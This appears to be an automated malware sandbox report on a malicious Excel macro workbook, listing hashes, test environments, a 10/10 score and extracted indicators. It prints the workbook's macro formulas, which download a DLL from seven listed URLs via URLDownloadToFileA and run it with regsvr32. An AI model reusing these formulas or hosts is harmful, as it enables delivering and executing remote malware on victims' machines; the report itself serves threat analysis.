General
-
Target
3b726e75dbb5d25c2058eb37cb2b82490cff8c260536d6a54ef7acaebe6ac20b
-
Size
73KB
-
Sample
241120-2zsxgazmaq
-
MD5
2782e4a26bbe1e9cdb8a34af0ae440e3
-
SHA1
d70d84ebd43556d546c3739df545dfd52ec6c8aa
-
SHA256
3b726e75dbb5d25c2058eb37cb2b82490cff8c260536d6a54ef7acaebe6ac20b
-
SHA512
7183704b5d5745d8a7f9943c3a39baf0a7b4affff6ab632cbd08fc967f7ea2e8c36d8dbc4ed6e189f2b9d9f722b732ce53b19a61958a40237649fcb1eefc00c1
-
SSDEEP
1536:i41yiXSto0NSVUINwtzLT7OMuuAe0yOcfpXZGsMlV4XG:B1yiCtzSmICpH7OZuvZGsMX
Behavioral task
behavioral1
Sample
3b726e75dbb5d25c2058eb37cb2b82490cff8c260536d6a54ef7acaebe6ac20b.xlsm
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
3b726e75dbb5d25c2058eb37cb2b82490cff8c260536d6a54ef7acaebe6ac20b.xlsm
Resource
win10v2004-20241007-en
Malware Config
Extracted
https://appleinfoway.com/venv/5Pp/
http://www.atelierkikala.com/Facebook/vXY2sLFfbSSCTh/
http://astrogurusunilbarmola.com/css/ucDJnRTACskNjrZOHr/
http://atters.net/cgi-bin/0yIPlpXo3156/
http://www.andrarose.com/wp-admin/9NE3hpWhdggun0YLeQ0/
http://ara-choob.com/data1/yPQ8/
http://asyadegirmen.com/Template/aweTuOE/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://appleinfoway.com/venv/5Pp/","..\ujg.dll",0,0) =IF('EGDGB'!F7<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.atelierkikala.com/Facebook/vXY2sLFfbSSCTh/","..\ujg.dll",0,0)) =IF('EGDGB'!F9<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://astrogurusunilbarmola.com/css/ucDJnRTACskNjrZOHr/","..\ujg.dll",0,0)) =IF('EGDGB'!F11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://atters.net/cgi-bin/0yIPlpXo3156/","..\ujg.dll",0,0)) =IF('EGDGB'!F13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.andrarose.com/wp-admin/9NE3hpWhdggun0YLeQ0/","..\ujg.dll",0,0)) =IF('EGDGB'!F15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ara-choob.com/data1/yPQ8/","..\ujg.dll",0,0)) =IF('EGDGB'!F17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://asyadegirmen.com/Template/aweTuOE/","..\ujg.dll",0,0)) =IF('EGDGB'!F19<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\ujg.dll") =RETURN()
Extracted
https://appleinfoway.com/venv/5Pp/
http://www.atelierkikala.com/Facebook/vXY2sLFfbSSCTh/
http://astrogurusunilbarmola.com/css/ucDJnRTACskNjrZOHr/
http://atters.net/cgi-bin/0yIPlpXo3156/
Targets
-
-
Target
3b726e75dbb5d25c2058eb37cb2b82490cff8c260536d6a54ef7acaebe6ac20b
-
Size
73KB
-
MD5
2782e4a26bbe1e9cdb8a34af0ae440e3
-
SHA1
d70d84ebd43556d546c3739df545dfd52ec6c8aa
-
SHA256
3b726e75dbb5d25c2058eb37cb2b82490cff8c260536d6a54ef7acaebe6ac20b
-
SHA512
7183704b5d5745d8a7f9943c3a39baf0a7b4affff6ab632cbd08fc967f7ea2e8c36d8dbc4ed6e189f2b9d9f722b732ce53b19a61958a40237649fcb1eefc00c1
-
SSDEEP
1536:i41yiXSto0NSVUINwtzLT7OMuuAe0yOcfpXZGsMlV4XG:B1yiCtzSmICpH7OZuvZGsMX
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-